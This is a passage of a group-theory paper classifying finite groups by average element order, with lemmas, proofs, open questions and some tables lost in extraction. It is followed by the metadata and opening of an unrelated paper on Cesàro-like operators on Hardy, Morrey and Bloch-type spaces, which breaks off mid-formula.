M)>|G|/3\), then by Lemma 2.7, \(M\) is nilpotent. Thus, by Lemma 2.5\((i)\), \(\operatorname{o}(M)>4\). Therefore, \(\operatorname{o}(G)\geq\frac{\operatorname{o}(M)}{2}+1>3\), as desired. Now assume that \(K_{0}=K\). Therefore, by Lemma 2.3, \(G\cong D(C_{2q})\) or \(G\cong C_{2q}\times C_{2}\), where \(q>3\). In the first case, \(\operatorname{o}(G)=\frac{\operatorname{o}(C_{q}\times C_{2})}{2}+1>3\). In the latter case, by Lemma 2.5\((i)\), \(\operatorname{o}(G)>3\). **Case 2)** If \(p=3\), then \(G=M\cup xM\cup x^{2}M\), for some \(x\in G\setminus M\). On the other hand, by the induction hypothesis, \(\operatorname{o}(M)>3\). So, \(\operatorname{o}(G)\geq\frac{\operatorname{o}(M)}{3}+2>3\). **Lemma 3.2**: _Let \(G\) be a finite group with \(|\pi(G)|\geq 2\). Then \(\operatorname{o}(G)\geq\operatorname{o}(S_{3})=\frac{13}{6}\), and equality holds if and only if \(G\cong S_{3}\)._ Proof.: For the groups of order \(6\), the statement holds. So we may assume that \(|G|\geq 10\). If \(G\) is of odd order, as \(\exp(G)\geq 3\), \(\operatorname{o}(G)\geq 3-\frac{2}{|G|}>2.86>\frac{13}{6}\). Now assume that \(G\) is of even order. If \(n_{2}(G)>\frac{2}{3}|G|-1\), then since \(r(G,1_{G})>\frac{2}{3}\), by Lemma 2.2, the Sylow \(2\)-subgroup of \(G\), say \(P\), is normal in \(G\). Now because \(|G:P|<\frac{|G|}{n_{2}(G)+1}<\frac{3}{2}\), \(G\) is a \(2\)-group, a contradiction. Hence, \(n_{2}(G)\leq\frac{2}{3}|G|-1\). As, \(\psi(G)\geq 1+2n_{2}(G)+3(|G|-n_{2}(G)-1)\geq\frac{7}{3}|G|-1\), we have \(\operatorname{o}(G)\geq\frac{7}{3}-\frac{1}{|G|}>\operatorname{o}(S_{3})\), since \(|G|\geq 10\). Previous lemma implies that \(\operatorname{o}(G)\leq S_{3}\), leads to \(G\cong S_{3}\), or \(G\) is a \(2\)-group. Now by [10, Corollary], we get that \(G\) is an elementary abelian \(2\)-group, if \(G\ncong S_{3}\), which is a new proof for [3, Theroem A]. The following lemma is obtained by [9, Theorem 1.2], but we prove it without referring to that result. **Lemma 3.3**: _If \(\operatorname{o}(G)<2.4\), then \(G\) is isomorphic to one of the following groups:_ 1. \(C_{3}\)_;_ 2. \(D_{8}\)_;_ 3. \(S_{3}\)_;_ 4. \(D(C_{3}\times C_{3})\)_;_ 5. _an elementary abelian_ \(2\)_-group._ Proof.: We note that the result holds when \(|G|\leq 10\). So we may assume that \(|G|\geq 11\). If \(|G|\) is odd, as \(exp(G)\geq 3\), it is easy to check that \(\mathrm{o}(G)\geq 3-2/|G|>\mathrm{o}(C_{3}\times C_{3})>2.7\), a contradiction. Now assume that \(|G|\) is even. Obviously the statement holds for elementary abelian \(2\)-groups and if \(G\) is a \(2\)-group which is not elementary abelian, then by [10, Corollary], \(n_{2}(G)\leq\frac{3}{4}|G|-1\). Therefore, \(\mathrm{o}(G)\geq\frac{1+2n_{2}(G)+4(|G|-n_{2}(G)-1)}{|G|}=2.5-\frac{1}{|G|}\), and since \(\mathrm{o}(G)<2.4\), we have \(|G|\leq 8\), a contradiction. In the sequel, suppose that \(G\) is not a \(2\)-group. If there exists a non-normal Sylow \(p\)-subgroup \(P\) of \(G\), for some odd prime \(p\), then by considering \(1_{G}\in\mathrm{Aut}(G)\) in Lemma 2.2, we have \(r(G,1_{G})\leq\frac{2}{p+1}\). It follows that \(n_{2}(G)\leq\frac{2}{p+1}|G|-1\). So, \(\psi(G)\geq 1+2n_{2}(G)+3(|G|-n_{2}(G)-1)>(3-\frac{2}{p+1})|G|-1\). Therefore, \(\mathrm{o}(G)\geq 2.5-\frac{1}{|G|}>2.4\), since \(p\geq 3\) and \(|G|\geq 11\), a contradiction. Therefore, \(G\cong H\rtimes Q\), where \(H\) is the Hall \(2^{\prime}\)-subgroup of \(G\), and \(Q\) is a Sylow \(2\)-subgroup of \(G\). Note that as we discussed in Lemma 3.1, if \(|Q|\leq 4\), then \(G\cong D(C_{3}\times C_{3})\), as desired. Let \(|Q|\geq 8\) and \(M\) be a subgroup of index \(2\) of \(G\). If \(n_{2}(G\setminus M)\leq\frac{|G|}{3}\), as it was discussed multiple times, \(\mathrm{o}(G)\geq\frac{\mathrm{o}(M)}{2}+\frac{4}{3}\). Since \(|M|\) has at least two prime divisors, by Lemma 3.2, \(\mathrm{o}(M)>\frac{13}{6}\), and so \(\mathrm{o}(G)>2.4\), which is a contradiction. Therefore, \(n_{2}(G\setminus M)>\frac{|G|}{3}\), and by Lemma 2.7, it follows that \(M\) is nilpotent. Now Lemma 2.5\((i)\) implies that \(\mathrm{o}(M)>4\). Hence, \(\mathrm{o}(G)\geq\frac{\mathrm{o}(M)}{2}+1>3\), a contradiction. Note that the previous lemma implies that \(\mathrm{o}(G)<2\) if and only if \(G\) is elementary abelian. **Remark 3.4**: _Throughout this paper, for simplicity we say \(G\) is a \(\star\)-group, if \(G\) is isomorphic to one of the following groups:_ 1. \(D_{8}\times D_{8}\)_;_ 2. \(D(A)\)_, where_ \(A\) _is an abelian_ \(2\)_-group;_ 3. \(H(r)\)_, for some integer_ \(r\)_;_ 4. \(S(r)\)_, for some integer_ \(r\)_._ **Lemma 3.5**: _Let \(G\) be a \(2\)-group with \(\mathrm{o}(G)<2.8\). Then \(n_{2}(G)>\frac{3}{5}|G|-2\), if \(|G|\geq 16\)._ Proof.: On the contrary assume that \(n_{2}(G)\leq\frac{3}{5}|G|-2\). So, \(\mathrm{o}(G)\geq\frac{1+2n_{2}(G)+4(|G|-n_{2}(G)-1)}{|G|}\geq 2.8+1/|G|>2.8\), a contradiction. **Lemma 3.6**: _Let \(G\) be a \(\star\)-group, and \(\mathrm{o}(G)<2.8\). Then \(G\) is isomorphic to one of the following groups:_ 1. \(H(2)\)_;_ 2. \(S(2)\)_;_ 3. \(D(C_{4}\times C_{4})\)_;_ 4. \(D(C_{4}\times C_{2}^{k})\)_, for some integer_ \(k\geq 0\)_._ Proof.: We consider each \(\star\)-group separately. Note that \(\mathrm{o}(D_{8}\times D_{8})=\frac{183}{64}>2.8\). If \(G\cong D(A)\), where \(A\) is an abelian \(2\)-group, then \(\mathrm{o}(G)=\frac{\mathrm{o}(A)}{2}+1\), and since \(\mathrm{o}(G)<2.8\), if follows that \(\mathrm{o}(A)<3.6\). Since \(\mathrm{o}(C_{8})>\mathrm{o}(C_{4}^{3})>\mathrm{o}(C_{4}\times C_{4}\times C _{2})>3.6\), we get that \(A\) is isomorphic to \(C_{4}\times C_{4}\) or \(C_{4}\times C_{2}^{k}\), for some integer \(k\geq 0\). If \(G\cong H(r)\), then \(|H(r)|=2^{2r+1}\), and \(n_{2}(H(r))=2^{2r}+2^{r}-1\). Now by Lemma 3.5, \(r\leq 2\). If \(G\cong S(r)\), then \(|S(r)|=2^{2r+1}\), and we can see that \(n_{2}(S(r))=2^{2r}+2^{r}-1\), which implies that \(r\leq 2\), by Lemma 3.5. Note that \(S(1)\cong H(1)\cong D_{8}\). Before we classify \(2\)-groups with \(\mathrm{o}(G)<2.8\), we take a close look at the bellow theorem, which is proved by Wall in [10, Pages 261-262]. It is the key to classify such \(2\)-groups. **Theorem** (C. T. C. Wall, [10]): Let \(G\) be a finite group. If \(n_{2}(G)>\frac{1}{2}|G|-1\), then \(G\) is isomorphic to one of the following groups: 1. \(D(A)\), where \(A\) is an abelian group; 2. \(D_{8}\times D_{8}\times C_{2}^{k}\), for some integer \(k\geq 0\); 3. \(H(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\); 4. \(S(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\). **Theorem 3.7**: _Let \(G\) be a \(2\)-group with \(\mathrm{o}(G)<2.8\). Then \(G\) is isomorphic to one of the following groups, where \(k\geq 0\) is an integer:_ 1. \(C_{4}\)_;_ 2. \(D_{8}\times C_{2}^{k}\)_;_ 3. \(D(C_{4}\times C_{4})\times C_{2}^{k}\)_;_ 4. \((D_{8}*D_{8})\times C_{2}^{k}\)_;_ 5. \(S(2)\times C_{2}^{k}\)_;_ 6. _an elementary abelian_ \(2\)_-group._ _Proof._ It is easy to check that the statement holds when \(|G|<16\). Assume that \(|G|\geq 16\). If \(G\) is abelian and \(G\) has a factor isomorphic to \(C_{4}\times C_{2}\) or \(C_{8}\), then \(\mathrm{o}(G)>\mathrm{o}(C_{4}\times C_{2})=2.875>2.8\), a contradiction. Obviously the result holds for elementary abelian \(2\)-groups. Hence, assume that \(G\) is non-abelian. By Lemma 3.5, we get that \(n_{2}(G)>\frac{3}{5}|G|-2\), and since \(|G|\geq 16\), \(n_{2}(G)>\frac{1}{2}|G|-1\). Now by the above theorem, we see that \(G\) is isomorphic to one of the following \(2\)-groups: 1. \(D(A)\), where \(A\) is an abelian \(2\)-groups; 2. \(D_{8}\times D_{8}\times C_{2}^{k}\), for some integer \(k\geq 0\); 3. \(H(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\); 4. \(S(r)\times C_{2}^{k}\), for some integers \(r\) and \(k\geq 0\). In case _(1)_, the statement holds by Lemma 3.6. In other cases, let \(E\) be the direct factor isomorphic to \(C_{2}^{k}\), and since \(\mathrm{o}(G/E)\leq\mathrm{o}(G)<2.8\), again by Lemma 3.6 and some easy calculations we get the result. **Proof of the Main Theorem.** Easily we can see that, if \(G\) is isomorphic to one of the groups listed in the Main Theorem, then \(\mathrm{o}(G)<2.8\). Assume that \(G\) is a counterexample of minimal order. Remark that as \(\mathrm{o}(G)<\mathrm{o}(A_{5})\), by [3, Theorem C], \(G\) is solvable. Let \(N\) be a minimal normal \(q\)-subgroup of \(G\), for some prime \(q\). As \(\mathrm{o}(G/N)<\mathrm{o}(G)\) and there is no cyclic counterexample, \(G/N\) satisfies the hypothesis of the theorem. So we consider each possibility for \(G/N\) separately: \((i)\) Let \(G/N\cong D_{12}\). In this case, \(G\) has a subgroup of index \(2\), say \(M\), such that \(M\) has a quotient isomorphic to \(C_{6}\). So, \(\mathrm{o}(M)>\mathrm{o}(C_{6})=3.5\). If \(n_{2}(G\setminus M)\leq|G|/3\), then \(\mathrm{o}(G)\geq\frac{\psi(M)+2|G|/3+4|G|/6}{|G|}>\frac{7}{4}+\frac{4}{3}>2.8\), a contradiction. Hence, \(n_{2}(G\setminus M)>|G|/3\), and by Lemma 2.7, \(M\) is nilpotent. So by Lemma 2.5, \(\mathrm{o}(M)>4\), implying a contradiction by Lemma 2.6. **(\(ii\))** Let \(G/N\cong S_{4}\). In this case, by Lemma 2.1, \(\mathrm{o}(G)\geq 2.75+\frac{\mathrm{o}(N)}{24}\). Since \(N\) is non-trivial, we get that \(\mathrm{o}(N)\geq 1.5\), hence \(\mathrm{o}(G)>2.8\), a contradiction. \((iii)\) Let \(G/N\cong C_{3}^{a}\), where \(a\in\{1,2\}\). In this case, let \(M\) be a normal subgroup of \(G\) of index \(3\). By Lemma 2.6, \({\rm o}(M)<2.4\). Now by Lemma 3.3, \(a=1\) and the only possibilities for \(M\) are \(C_{3}\) and \(C_{2}^{k}\), for some integer \(k\). In the first case, as \({\rm o}(C_{9})>6\), \(G\cong C_{3}^{2}\), we get a contradiction. In the second case, \(G\) is a group of order \(3\cdot 2^{k}\) and Fitting lemma implies that \(N=C_{N}(P)\times[P,N]\), where \(P\in{\rm Syl}_{3}(G)\). By the fact that \(N\) is a minimal normal subgroup of \(G\) and \(C_{N}(P)\triangleleft G\), we get that either \(G\) is a Frobenius group described in Case \((iv)\), which is impossible as \(G\) is a counterexample, or \(G=P\times N\), a contradiction by Lemma 2.5\((i)\). **(\(iv\))** Let \(G/N\cong C_{2}^{2k}\rtimes C_{3}\), be a Frobenius group, for some integer \(k\). If \(N\) is a \(2\)-group, then \(N\leq{\bf Z}(P)\), where \(P\) is the Sylow \(2\)-subgroup of \(G\). Note that by Lemma 2.6, \({\rm o}(P)<2.4\), and by Lemma 3.3, we get that \(P\cong D_{8}\) or \(P\cong C_{2}^{a}\), for some integer \(a\). Note that as \({\rm Aut}(D_{8})\cong D_{8}\), the first case implies the nilpotency of \(G\), a contradiction by Lemma 2.5. Therefore, \(P\cong C_{2}^{a}\). First, assume that \(N\leq{\bf Z}(G)\), then \(|N|=2\). Thus, \(n_{6}(G\setminus P)\geq n_{3}(G\setminus P)\), and \[{\rm o}(G)\geq\frac{\psi(P)+3(|G|-|P|)/2+6(|G|-|P|)/2}{3|P|}=\frac{{\rm o}(P) }{3}+3>3,\] a contradiction. So, \(N\cap{\bf Z}(G)=1\) and we get that the Sylow \(3\)-subgroup of \(G\) acts on \(N\) and \(G/N\), Frobeniusly. Therefore, \(G\) is a Frobenius group with an elementary abelian \(2\)-group as its kernel, which is the group described in Case \((iv)\), a contradiction. Now, we assume that \(|N|\) is odd. In this case, using Lemma 2.6, \({\rm o}(M)<2.4\), where \(M\) is an index \(3\) normal subgroup of \(G\). So, by Lemma 3.3, \(M\cong D(C_{3}\times C_{3})\), which implies \(2k=1\), a contradiction. **(\(v\))** Let \(G/N\) be a \(2\)-group. Note that by Theorem 3.7, \(G\) is not a \(2\)-group. Now by Lemma 3.1, \(|G/N|\geq 8\). We claim that \(G/G^{\prime}N\) is an elementary abelian \(2\)-group. Otherwise, there exists a normal subgroup \(H\) of \(G\) such that \(G/H\cong C_{4}\), \({\rm o}(G)\geq\frac{\psi(H)+10|H|}{4|H|}=\frac{{\rm o}(H)}{4}+2.5\), which implies that \({\rm o}(H)<1.2\), a contradiction. So, \(G/G^{\prime}N\) is an elementary abelian \(2\)-group. First, let \(G^{\prime}N=N\). Then every subgroup of order \(2|N|\) is a normal subgroup of \(G\). Let \(K\) be such a subgroup. Then the Sylow \(q\)-subgroup of \({\bf Z}(K)\) is normal in \(G\) and by the fact that \(N\) is a minimal normal subgroup, either \(K\cong N\times M\), where \(M\) is a group of order \(2\), or \(K\) is a Frobenius group. If the first case occurs, by the minimality of \(|G|\), \(G/M\) is isomorphic to \(D_{12}\). Note that since \(G/N\) is completely reducible, \(G\) splits on \(M\). Therefore, \(G\cong C_{2}\times D_{12}\), which is a contradiction, since \({\rm o}(C_{2}\times D_{12})=\frac{73}{24}>3\). So, \(K\) is a Frobenius group. Since this holds for all subgroups of order \(2|N|\), we get that \(G\) is a Frobenius group and \(G/N\cong C_{2}\), a contradiction. Therefore, \(N<G^{\prime}N\). Let \(S\) be a normal subgroup of \(G\) containing \(N\), such that \(G^{\prime}N/S\) is a chief factor of \(G\), isomorphic to \(C_{2}\). Therefore, \(G/S\) is a generalized extraspecial group (see [8]), and by Theorem 3.7, we conclude that \(G/S\cong D_{8}\times C_{2}^{k}\) or \(G/S\cong D_{8}*D_{8}\times C_{2}^{k}\), for some \(k\geq 0\). In the first case, \(G\) has a factor \(G/L\) isomorphic to \(D_{8}\). Let \(T/L\) be a subgroup of \(G/L\) such that \(T/L\cong C_{4}\). Note that \(N\leq L\), hence, \({\rm o}(L)>2\). Therefore, \({\rm o}(T)\geq\frac{\psi(L)+10|L|}{4|L|}=2.5+\frac{{\rm o}(L)}{4}>3\). If \(n_{2}(G\setminus T)\leq|G|/3\), \({\rm o}(G)\geq\frac{\psi(T)+2|G|/3+4|G|/6}{|G|}=\frac{{\rm o}(T)}{2}+\frac{4} {3}>2.8\), a contradiction. So, \(n_{2}(G\setminus T)>|G|/3\), by Lemma 2.7, \(T\) is nilpotent. Then, by Lemma 2.5\((i)\), \({\rm o}(T)>4\), which implies a contradiction by Lemma 2.6. In the second case, there exists a subgroup \(W\leq G\) of index \(2\), where \(W\) has a quotient, say \(W/H\), isomorphic to \(D_{8}*C_{4}\). Note that \({\rm o}(D_{8}*C_{4})=\frac{47}{16}=2.9375\), and since \(N\leq H\), \({\rm o}(H)>2\). By Lemma 2.1, we get that \({\rm o}(W)>3\). Now similar to the previous case, we get a contradiction. \((vi)\) Let \(G/N\cong C_{3}^{k}\rtimes C_{2}\) be a Frobenius group, for some integer \(k\). By assumption, \(|N|=q^{a}\), for some integer \(a\). If \(q\) is odd, then by Lemma 3.1\((i)\), \(q=3\) and \(G\cong C_{3}^{a+k}\rtimes C_{2}\), which is a Frobenius group, a contradiction. So, \(q=2\). Note that every subgroup containing \(N\) of order \(3|N|\) is a normal subgroup of \(G\). Hence, the Sylow 2-subgroup of \({\bf Z}(M)\) is a normal subgroup of \(G\), and as \(N\) is minimal normal in \(G\), either \({\bf Z}(M)=M\) or \({\bf Z}(M)=1\). In the first case, \(M=N\times Q\), where \(Q\) is the Sylow 3-subgroup of \(M\). By the above discussion, \(G/Q\) is not isomorphic to the groups stated in Cases \((i)\)-\((v)\), and since \(4\mid|G|\), we get that \(G/Q\) is not isomorphic to the group mentioned in Case \((vi)\), a contradiction to the minimality of \(|G|\). Whence, \({\bf Z}(M)=1\), which yields that \(M\) is a Frobenius group. Thus, there is no element of order 6 in \(G\), implying that there is a normal subgroup of \(G\) of index 2, say \(T\), which is a Frobenius group and by the structure of the Frobenius groups, we get that \(k=1\). So, \({\rm Syl}_{2}(G)=\{P_{1},P_{2},P_{3}\}\), and \(N=P_{i}\cap P_{j}\), for \(1\leq i<j\leq 3\). If the Sylow 2-subgroups of \(G\) are abelian, then \(\bigcup\limits_{i=1}^{3}P_{i}\subset C_{G}(N)\), hence, \(C_{G}(N)=G\), a contradiction. Whence, \(|G|\geq 24\). Sylow 2-subgroups of \(G\) are not abelian, so by [10, Corollary], every Sylow 2-subgroup of \(G\) has at least \(|G|/12\) elements of order 4. On the other hand, we know that \(n_{3}(G)=|G|-|P_{1}\cup P_{2}\cup P_{3}|=|G|/3\). Hence, \(\psi(G)=1+3n_{3}(G)+4n_{4}(G)+2(|G|-n_{3}(G)-n_{4}(G)-1)\geq\frac{17}{6}|G|-1\). Hence, \({\rm o}(G)\geq\frac{17}{6}-\frac{1}{|G|}\), which implies that \(|G|=24\), and so \(G\cong S_{4}\), a contradiction. \(\blacksquare\) **Remark 3.8**: _All the groups in the Main Theorem and their average orders are listed in the following tables:_ \begin{tabular}{} [MISSING_PAGE_POST] [MISSING_PAGE_POST] [MISSING_PAGE_POST] [MISSING_PAGE_POST] \end{tabular} \begin{tabular}{} \begin{tabular}{} [MISSING_PAGE_POST] \end{tabular} \begin{}{} \end{tabular} \begin{tabular}{} Therefore, \(m=1\), and \(H\) is a \(2\)-group of order \(2^{k+5}\) with \(\mathrm{o}(H)<2.8\). Now Table B shows that \(H\) is isomorphic to one of three mentioned groups. \(\blacksquare\) According to the above corollary we pose the following two questions: **Question 3.9**: What are the values of \(n\) for which there exists a \(n\)-recognizable group by average order? **Question 3.10**: Is there any finite group \(G\) such that there exists infinitely many non-isomorphic groups with average order \(\mathrm{o}(G)\)? As an application, by calculating the average orders in the Main Theorem, we get that other than \(S_{4}\), there exists no group \(G\), such that \(\mathrm{o}(G)\) lies in the interval \([\frac{67}{24},2.8]\). This is a partial answer to [6, Conjecture 2.11], about the density of \(Im(\mathrm{o})=\{\mathrm{o}(G)|G\) is a finite group\(\}\). Now we see that \(Im(\mathrm{o})\) is not dense in \([a,\infty)\), for any \(a\leq\frac{67}{24}\). **Conflict of Interest** he authors have no conflicts of interest to declare. All co-authors have seen and agree with the contents of the manuscript and there is no financial interest to report.
2305.03333
The Ces`aro-like operator on some analytic function spaces
Let $\mu$ be a finite positive Borel measure on the interval $[0, 1)$ and $f(z)=\sum_{n=0}^{\infty}a_{n}z^{n} \in H(\mathbb{D})$. The Ces\`aro-like operator is defined by $$ \mathcal {C}_{\mu} (f)(z)=\sum^\infty_{n=0}\left(\mu_n\sum^n_{k=0}a_k\right)z^n, \ z\in \mathbb{D}, $$ where, for $n\geq 0$, $\mu_n$ denotes the $n$-th moment of the measure $\mu$, that is, $\mu_n=\int_{[0, 1)} t^{n}d\mu(t)$. Let $X$ and $Y$ be subspaces of $H( \mathbb{D})$, the purpose of this paper is to study the action of $\mathcal {C}_{\mu}$ on distinct pairs $(X, Y)$. The spaces considered in this paper are Hardy space $H^{p}(0<p\leq\infty)$, Morrey space $L^{2,\lambda}(0<\lambda\leq1)$, mean Lipschitz space, Bloch type space, etc.
Pengcheng Tang
2023-05-05T07:23:30Z
http://arxiv.org/abs/2305.03333v1
# The Cesaro-like operator on some analytic function spaces ###### Abstract Let \(\mu\) be a finite positive Borel measure on the interval \([0,1)\) and \(f(z)=\sum_{n=0}^{\infty}a_{n}z^{n}\in H(\mathbb{D})\). The Cesaro-like operator is defined by \[\mathcal{C}_{\mu}(f)(z)=\sum_{n=0}^{\infty}\left(\mu_{n}\sum_{k=0}^{n}a_{k} \right)z^{n},\ z\in\mathbb{D},\] where, for \(n\geq 0\), \(\mu_{n}\) denotes the \(n\)-th moment of the measure \(\mu\), that is, \(\mu_{n}=\int_{[0,1)}t^{n}d\mu(t)\). Let \(X\) and \(Y\) be subspaces of \(H(\mathbb{D})\), the purpose of this paper is to study the action of \(\mathcal{C}_{\mu}\) on distinct pairs \((X,Y)\). The spaces considered in this paper are Hardy space \(H^{p}(0<p\leq\infty)\), Morrey space \(L^{2,\lambda}(0<\lambda\leq 1)\), mean Lipschitz space, Bloch type space, etc. **Keywords:** Cesaro-like operator, Carleson measure, Hardy spaces; Morrey space. **MSC 2010:** 47B38, 30H10 ## 1 Introduction Let \(\mathbb{D}=\{z\in\mathbb{C}:|z|<1\}\) denote the open unit disk of the complex plane \(\mathbb{C}\) and \(H(\mathbb{D})\), denote the space of all analytic functions in \(\mathbb{D}\) and \(dA(z)=\frac{1}{\pi}dxdy\) the normalized area Lebesgue measure. For \(0<\alpha<\infty\), the Bloch-type space, denoted by \(\mathcal{B}^{\alpha}\), is defined as \[\mathcal{B}^{\alpha}=\{f\in H(\mathbb{D}):||f||_{\mathcal{B}^{\alpha}}=|f(0)| +\sup_{z\in\mathbb{D}}(1-|z|^{2})^{\alpha}|f^{\prime}(z)|<\infty\}.\] If \(\alpha=1\), then \(\mathcal{B}^{\alpha}\) is just the classic Bloch space \(\mathcal{B}\). Let \(0<p\leq\infty\), the classical Hardy space \(H^{p}\) consists of those functions \(f\in H(\mathbb{D})\) for which \[||f||_{p}=\sup_{0\leq r<1}M_{p}(r,f)<\infty,\] where \[M_{p}(r,f)=\left(\frac{1}{2\pi}\int_{0}^{2\pi}|f(re^{i\theta})|^{p}d\theta\right) ^{1/p},\ 0<p<\infty,\] \[M_{\infty}(r,f)=\sup_{|z|=r}|f(z)|.\] Let \(I\subset\partial\mathbb{D}\) be an arc, and \(|I|\) denote the length of \(I\). The Carleson square \(S(I)\) is defined as \[S(I)=\{re^{i\vartheta}:e^{i\vartheta}\in I,\ 1-\frac{|I|}{2\pi}\leq r<1\}.\] Let \(\mu\) be a positive Borel measure on \(\mathbb{D}\). For \(0\leq\beta<\infty\) and \(0<t<\infty\), we say that \(\mu\) is a \(\beta\)-logarithmic \(t\)-Carleson measure (resp.a vanishing \(\beta\)-logarithmic \(t\)-Carleson measure) if \[\sup_{|I|\subset\partial\mathbb{D}}\frac{\mu(S(I))(\log\frac{2\pi}{|I|})^{ \beta}}{|I|^{t}}<\infty,\ \ \mbox{resp.}\ \ \lim_{|I|\to 0}\frac{\mu(S(I))(\log\frac{2\pi}{|I|})^{ \beta}}{|I|^{t}}=0.\] See [31] for more about logarithmic type Carleson measure. A positive Borel measure \(\mu\) on \([0,1)\) can be seen as a Borel measure on \(\mathbb{D}\) by identifying it with the measure \(\overline{\mu}\) defined by \[\overline{\mu}(E)=\mu(E\cap[0,1)),\ \ \mbox{for any Borel subset}\ \ E\ \ \mbox{of}\ \ \mathbb{D}.\] In this way, a positive Borel measure \(\mu\) on \([0,1)\) is a \(\beta\)-logarithmic \(t\)-Carleson measure if and only if there exists a constant \(M>0\) such that \[\log^{\beta}\frac{e}{1-t}\mu([s,1))\leq M(1-s)^{t},\ \ 0\leq s<1.\] Let \(0<\lambda\leq 1\), the Morrey space \(L^{2,\lambda}(\mathbb{D})\) is the set of all \(f\in H^{2}\) such that \[\sup_{I\subset\partial\mathbb{D}}\left(\frac{1}{|I|^{\lambda}}\int_{I}|f(e^{i \theta})-f_{I}|^{2}d\theta\right)^{\frac{1}{2}}<\infty.\] The space is \(L^{2,\lambda}(\mathbb{D})\) a Banach space under the norm \[||f||_{L^{2,\lambda}}=|f(0)|+\sup_{I\subset\partial\mathbb{D}}\left(\frac{1}{ |I|^{\lambda}}\int_{I}|f(e^{i\theta})-f_{I}|^{2}d\theta\right)^{\frac{1}{2}}\] It is well known that \(L^{2,1}=BMOA\). The Morrey spaces increase when the parameter \(\lambda\) decreases, so we have the following relation \[BMOA\subseteq L^{2,\lambda_{2}}\subseteq L^{2,\lambda_{1}}\subseteq H^{2},\ \ 0\leq\lambda_{1}\leq\lambda_{2}\leq 1.\] For \(0<\lambda\leq 1\) and any function \(f\in L^{2,\lambda}\), it has the following equivalent norm \[||f||_{L^{2,\lambda}}\asymp|f(0)|+\sup_{w\in\mathbb{D}}\left((1-|w|^{2})^{1- \lambda}\int_{\mathbb{D}}|f^{\prime}(z)|^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^ {\frac{1}{2}},\] where \(\sigma_{w}\) stands for the Mobious transformation \(\sigma_{w}(z)=\frac{w-z}{1-z\overline{w}}\). See [25] for this characterization. It is well known that functions \(f\in BMOA\) have logarithmic growth, \[|f(z)|\leq C\log\frac{2}{1-|z|}.\] This does not remain true for \(f\in L^{2,\lambda}\) when \(0<\lambda<1\). Indeed, it follows Lemma 2 of [14] that \[H^{\frac{2}{1-\lambda}}\subseteq L^{2,\lambda}\subseteq H^{2},\ \ 0<\lambda<1.\] It is known that for \(0<\lambda<1\), \(f\in L^{2,\lambda}\) satisfies \[|f(z)|\lesssim\frac{||f||_{L^{2,\lambda}}}{(1-|z|)^{\frac{1-\lambda}{2}}},\ \ z\in\mathbb{D} \tag{1.1}\] By (1.1) we have that \(L^{2,\lambda}\subseteq B^{\frac{3-\lambda}{2}}\) for all \(0<\lambda\leq 1\). When \(\lambda=1\), it is obvious that the inclusion is strictly. For \(0<\lambda<1\), the function \(h(z)=\sum_{k=0}^{\infty}z^{2^{k}}\in\mathcal{B}\subsetneq\mathcal{B}^{\frac{3 -\lambda}{2}}\) shows that the inclusion is also strictly. Since \(h\) has a radial limit almost nowhere and hence \(h\notin H^{p}\) for any \(0<p<\infty\), this implies that \(h\notin L^{2,\lambda}\). The reader is referred to [10, 13, 38, 39] for more about Morrey space. Let \(1\leq p<\infty\) and \(0<\alpha\leq 1\), the mean Lipschitz space \(\Lambda^{p}_{\alpha}\) consists of those functions \(f\in H(\mathbb{D})\) having a non-tangential limit almost everywhere such that \(\omega_{p}(t,f)=O(t^{\alpha})\) as \(t\to 0\). Here \(\omega_{p}(\cdot,f)\) is the integral modulus of continuity of order \(p\) of the function \(f(e^{i\theta})\). It is known (see [27]) that \(\Lambda^{p}_{\alpha}\) is a subset of \(H^{p}\) and \[\Lambda^{p}_{\alpha}=\left(f\in H(\mathbb{D}):M_{p}(r,f^{\prime})=O\left( \frac{1}{(1-r)^{1-\alpha}}\right),\ \ \text{as}\ r\to 1\right).\] The space \(\Lambda^{p}_{\alpha}\) is a Banach space with the norm \(||\cdot||_{\Lambda^{p}_{\alpha}}\) given by \[\|f\|_{\Lambda^{p}_{\alpha}}=|f(0)|+\sup_{0\leq r<1}(1-r)^{1-\alpha}M_{p}(r,f ^{\prime}).\] In [26], Shapiro and Sledd proved that \[\Lambda^{p}_{\frac{1}{p}}\subseteq BMOA.\ \ 1<p<\infty.\] When \(p=1\), the space \(\Lambda^{1}_{1}\) is equivalent to the space \[\left\{f\in H(\mathbb{D}):\sup_{0\leq r<1}(1-r)M_{1}(f^{\prime\prime},r)< \infty\right\}. \tag{1.2}\] See [24, 11] for more about Lipschitz space and related analytic function spaces. For \(f(z)=\sum_{n=0}^{\infty}\hat{f}(n)z^{n}\in H(\mathbb{D})\), the Cesaro operator \(\mathcal{C}\) is defined by \[\mathcal{C}(f)(z)=\sum_{n=0}^{\infty}\left(\frac{1}{n+1}\sum_{k=0}^{n}\widehat{ f}(k)\right)z^{n}=\int_{0}^{1}\frac{f(tz)}{1-tz}dt,\ z\in\mathbb{D}.\] The Cesaro operator \(\mathcal{C}\) is bounded on \(H^{p}\) for \(0<p<\infty\). The case of \(1<p<\infty\) follows from a result of Hardy on Fourier series [8] together with the Riesz transform. Siskakis [3] give an alternative proof of this result and to extend it to \(p=1\) by using semigroups of composition operators. A direct proof of the boundedness on \(H^{1}\) was given by Siskakis in [5]. Miao [15] proved the case \(0<p<1\). Stempak [19] gave a proof valid for \(0<p\leq 2\). Andersen [18] and Nowak [21] provided another proof valid for all \(0<p<\infty\). In the case \(p=\infty\), since \(\mathcal{C}(1)(z)=\log\frac{1}{1-z}\notin H^{\infty}\), so that \(\mathcal{C}(H^{\infty})\nsubseteq H^{\infty}\). Danikas and Siskakis [22] proved that \(\mathcal{C}(H^{\infty})\nsubseteq BMOA\) and \(\mathcal{C}(BMOA)\nsubseteq BMOA\). Cesaro operator \(\mathcal{C}\) act on weighted Bergman spaces, Dirichlet space and general mixed normed spaces \(H(p,q,\varphi)\) the reader is referred to [5, 33, 1, 28, 16]. Recently, Galanopoulos, Girela and Merchan [29] introduced a Cesaro-like operator \(\mathcal{C}_{\mu}\) on \(H(\mathbb{D})\), which is a natural generalization of the classical Cesaro operator \(\mathcal{C}\). They consider the following generalization: For a positive Borel measure \(\mu\) on the interval \([0,1)\) they define the operator \[\mathcal{C}_{\mu}(f)(z)=\sum_{n=0}^{\infty}\left(\mu_{n}\sum_{k=0}^{n}\widehat 